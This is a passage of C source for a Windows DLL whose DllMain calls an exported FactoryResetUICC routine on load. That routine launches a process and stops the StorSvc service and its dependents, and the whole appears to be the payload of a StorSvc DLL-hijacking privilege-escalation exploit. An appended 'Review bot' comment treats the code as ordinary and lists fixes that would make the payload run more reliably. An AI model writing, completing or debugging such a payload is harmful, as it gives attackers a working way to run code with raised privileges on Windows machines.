goto stop_cleanup;
}
}
// If the service is running, dependencies must be stopped first.
StopDependentServices();
// Send a stop code to the service.
if (!ControlService(
schService,
SERVICE_CONTROL_STOP,
(LPSERVICE_STATUS)&ssp))
{
goto stop_cleanup;
}
// Wait for the service to stop
while (ssp.dwCurrentState != SERVICE_STOPPED)
{
Sleep(ssp.dwWaitHint);
if (!QueryServiceStatusEx(
schService,
SC_STATUS_PROCESS_INFO,
(LPBYTE)&ssp,
sizeof(SERVICE_STATUS_PROCESS),
&dwBytesNeeded))
{
goto stop_cleanup;
}
if (ssp.dwCurrentState == SERVICE_STOPPED)
break;
if (GetTickCount64() - dwStartTime > dwTimeout)
{
goto stop_cleanup;
}
}
stop_cleanup:
CloseServiceHandle(schService);
CloseServiceHandle(schSCManager);
}
BOOL __stdcall StopDependentServices()
{
DWORD i;
DWORD dwBytesNeeded;
DWORD dwCount;
LPENUM_SERVICE_STATUS lpDependencies = NULL;
ENUM_SERVICE_STATUS ess;
SC_HANDLE hDepService;
SERVICE_STATUS_PROCESS ssp;
SC_HANDLE schSCManager, schService;
LPCTSTR szSvcName = L"StorSvc";
DWORD dwStartTime = GetTickCount64();
DWORD dwTimeout = 30000; // 30-second time-out
schSCManager = OpenSCManager(
NULL, // local computer
NULL, // ServicesActive database
SC_MANAGER_ALL_ACCESS); // full access rights
if (NULL == schSCManager)
{
return;
}
// Get a handle to the service.
schService = OpenService(
schSCManager, // SCM database
szSvcName, // name of service
SERVICE_STOP |
SERVICE_QUERY_STATUS |
SERVICE_ENUMERATE_DEPENDENTS);
if (schService == NULL)
{
CloseServiceHandle(schSCManager);
return;
}
// Pass a zero-length buffer to get the required buffer size.
if (EnumDependentServices(schService, SERVICE_ACTIVE,
lpDependencies, 0, &dwBytesNeeded, &dwCount))
{
// If the Enum call succeeds, then there are no dependent
// services, so do nothing.
return TRUE;
}
else
{
if (GetLastError() != ERROR_MORE_DATA)
return FALSE; // Unexpected error
// Allocate a buffer for the dependencies.
lpDependencies = (LPENUM_SERVICE_STATUS)HeapAlloc(
GetProcessHeap(), HEAP_ZERO_MEMORY, dwBytesNeeded);
if (!lpDependencies)
return FALSE;
__try {
// Enumerate the dependencies.
if (!EnumDependentServices(schService, SERVICE_ACTIVE,
lpDependencies, dwBytesNeeded, &dwBytesNeeded,
&dwCount))
return FALSE;
for (i = 0; i < dwCount; i++)
{
ess = *(lpDependencies + i);
// Open the service.
hDepService = OpenService(schSCManager,
ess.lpServiceName,
SERVICE_STOP | SERVICE_QUERY_STATUS);
if (!hDepService)
return FALSE;
__try {
// Send a stop code.
if (!ControlService(hDepService,
SERVICE_CONTROL_STOP,
(LPSERVICE_STATUS)&ssp))
return FALSE;
// Wait for the service to stop.
while (ssp.dwCurrentState != SERVICE_STOPPED)
{
Sleep(ssp.dwWaitHint);
if (!QueryServiceStatusEx(
hDepService,
SC_STATUS_PROCESS_INFO,
(LPBYTE)&ssp,
sizeof(SERVICE_STATUS_PROCESS),
&dwBytesNeeded))
return FALSE;
if (ssp.dwCurrentState == SERVICE_STOPPED)
break;
if (GetTickCount64() - dwStartTime > dwTimeout)
return FALSE;
}
}
__finally
{
// Always release the service handle.
CloseServiceHandle(hDepService);
}
}
}
__finally
{
// Always free the enumeration buffer.
HeapFree(GetProcessHeap(), 0, lpDependencies);
}
}
return TRUE;
}
int DllExport FactoryResetUICC()
{
DoStuff();
DoStopSvc();
return 0;
}
DllExport BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
FactoryResetUICC();
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
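Review bot: In DoStuff `PROCESS_INFORMATION pi;` is never initialized and the CreateProcess result is not checked, so on failure the two CloseHandle calls operate on indeterminate handle values; declare `PROCESS_INFORMATION pi = { 0 };` and close the handles only when CreateProcess returns non-zero (the lpCommandLine argument is also a wide string literal, which the CreateProcessW contract allows the call to modify, so it should be a writable `wchar_t cmd[]` array). In both DoStopSvc and StopDependentServices the 64-bit result of GetTickCount64() is truncated into a `DWORD dwStartTime`, and the first timeout check uses GetTickCount() while the second uses GetTickCount64(), so the elapsed-time arithmetic mixes widths; declare `ULONGLONG dwStartTime = GetTickCount64();` and use GetTickCount64() in every check. StopDependentServices is called from DoStopSvc before any declaration of it exists (an implicit int/cdecl declaration in C, against its actual BOOL __stdcall definition) and returns with a bare `return;` from a BOOL function on the OpenSCManager/OpenService failure paths; add a prototype above DoStopSvc and change those two to `return FALSE;`. The same function opens its own schSCManager and schService handles and closes neither on any path, including the `return TRUE` branches, which leaks two SCM handles per call. DllMain calls FactoryResetUICC() before the switch, so it runs for every ul_reason_for_call and the DLL_PROCESS_ATTACH case is effectively dead code; gating the call on that case is presumably what the switch was written for.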